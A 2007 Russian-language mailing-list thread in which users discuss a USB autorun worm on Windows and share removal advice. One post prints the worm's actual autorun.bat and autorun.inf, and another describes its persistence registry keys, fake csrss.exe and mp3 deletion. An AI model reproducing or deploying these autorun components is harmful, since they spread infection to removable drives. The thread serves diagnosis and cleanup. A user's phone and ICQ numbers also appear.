Отправляет email-рассылки с помощью сервиса Sendsay

[TC] Открытие локальных дисков

Здравствуйте, Рафис. А еще у вашего знакомого в контекстном меню, наверное, появились,
странные пункты. Если это так, то есть два пути. Вы либо установите антивирус
(насколько я знаю, ни один из антивирусов кроме nod32 этого вируса не знает)
и он вам все удалит, либо вручную. Сначала включаете отображение скрытых и системных
файлов. Потом следуете в папку
C:\WINDOWS\system32
и находите там вручную все файлы с разными расширениями, называющиеся autorun
и удаляете их, не смотря на крики системы о том, что вы, дескать, можете о том
пожалеть. Далее изучаете корневые каталоги всех локальных дисков на наличие аналогичного
комплекта файлов и столь же безжалостно их искореняете. Не забудьте также проверить
все флешки и плееры, карточки и фтоаппараты, подключавшиеся к этому компьютеру.
И будет вам хорошо. С глубоким уважеием и пожеланиями успехов на поле брани с
вирусяками, Денис, г. Харьков.

Ответить   Mon, 1 Oct 2007 02:50:05 +0300 (#694293)

 

Ответы:

Здравствуйте, Denis.

такое чудо повергло не только знакомого рафиса, но и мои компьютеры на
работе. специально принес для исследования на флешке следующие файлы,
которые кстати я намеренно не копировал:
1. папка recycler содержит файл autorun.exe
2. autorun.bat, текст:
echo off
rem autorunIз
if exist .\autorun.reg regedit /s .\autorun.reg
if not "%1"=="" goto open
if exist autorun.vbs start WScript.exe autorun.vbs&exit
if exist %SYSTEMROOT%\system32\autorun.vbs start WScript.exe %SYSTEMROOT%\system32\autorun.vbs&exit
exit
:open
if not "%1"=="Open" goto next
start explorer .\
exit
:next
if not "%1"=="Over" goto :next2
exit
:next2
if "%1"=="-" attrib -s -a -h -r %2\autorun.*
if "%1"=="+" attrib +s +a +h +r %2\autorun.*
:end

3. autorun.bin
4. autorun.exe
5. autorun.exe.exe
6. autorun.fcb
7. autorun.ico
8. autorun.inf, текст:
[autorun]
open=
shell\open=Eт(&O)
shell\open\Command=RECYCLER\autorun.exe -OpenCurDir
shell\open\Default=1
shell\explore=ЧКФEЬАнЖч(&X)
shell\explore\Command=RECYCLER\autorun.exe -ExploreCurDir

9. autorun.ini
10. autorun.srm
11. autorun.reg
12. autorun.txt
13. autorun.vbs
14. autorun.wsh

так вот наконец имею и я вопрос:
сколь опасен подобный вирус?
кто с ним сталкивался и что он делает?
das_in***@m*****.ru
das_in***@m*****.kg
Icq 331894252
моб. тел: +996 555 448111

Ответить   Mon, 1 Oct 2007 20:00:22 +0600 (#694470)

 

Здравствуйте, das.

сколь опасен подобный вирус?
кто с ним сталкивался и что он делает?
Попробую ответить.

Файловый вирус. Является приложением Windows (PE EXE- файл). Имеет
размер 380416 байт. Написан на Delphi. При запуске вирус копирует свой
исполняемый файл в каталоги Windows: %System%\config\csrss.exe
%WinDir%\media\arona.exe Также программа создает следующий файл:
%System%\logon.bat Данный файл при запуске на исполнение запускает
копию вируса: %System%\config\csrss.exe С целью автоматического
запуска при каждом последующем старте операционной системы вирус
добавляет ссылку на данный файл в ключ автозапуска системного реестра:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce] "Worms" =
"%System%\logon.bat" Вредоносная программа генерирует файлы:
%System%\config\autorun.inf h:\autorun.inf f:\autorun.inf
i:\autorun.inf g:\autorun.inf k:\autorun.inf l:\autorun.inf
o:\autorun.inf j:\autorun.inf Указанные файлы запускаются каждый раз,
когда пользователь открывает соответствующие разделы жесткого диска в
Проводнике. Аналогично %System%\logon.bat при исполнении файлы
запускают копию вируса %System%\config\csrss.exe. Деструктивная
активность Программа изменяет значения следующих ключей реестра:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System]
DisableTaskMgr = 1
[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
NoFolderOptions = 1 Также вирус производит поиск файлов с расширением
.mp3 в разделах жесткого диска: d:\ c:\ e:\ f:\ g:\ h:\ Найденные
файлы удаляются. Рекомендации по удалению Если ваш компьютер не был
защищен антивирусом и оказался заражен данной вредоносной программой,
то для ее удаления необходимо выполнить следующие действия: список из
5 элементов 1. При помощи Диспетчера задач завершить процесс вируса.
2. Удалить оригинальный файл вируса (его расположение на зараженном
компьютере зависит от способа, которым программа попала на компьютер).
3. Удалить параметры из ключей системного реестра:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System]
DisableTaskMgr = 1
[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
NoFolderOptions = 1
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce] "Worms" =
"%System%\logon.bat" 4. Удалить следующие файлы:
%System%\config\csrss.exe %WinDir%\media\arona.exe %System%\logon.bat
%System%\config\autorun.inf h:\autorun.inf f:\autorun.inf
i:\autorun.inf g:\autorun.inf k:\autorun.inf l:\autorun.inf
o:\autorun.inf j:\autorun.inf 5. Произвести полную проверку компьютера
Антивирусом

Ответить   Tue, 2 Oct 2007 13:41:52 +1100 (#694630)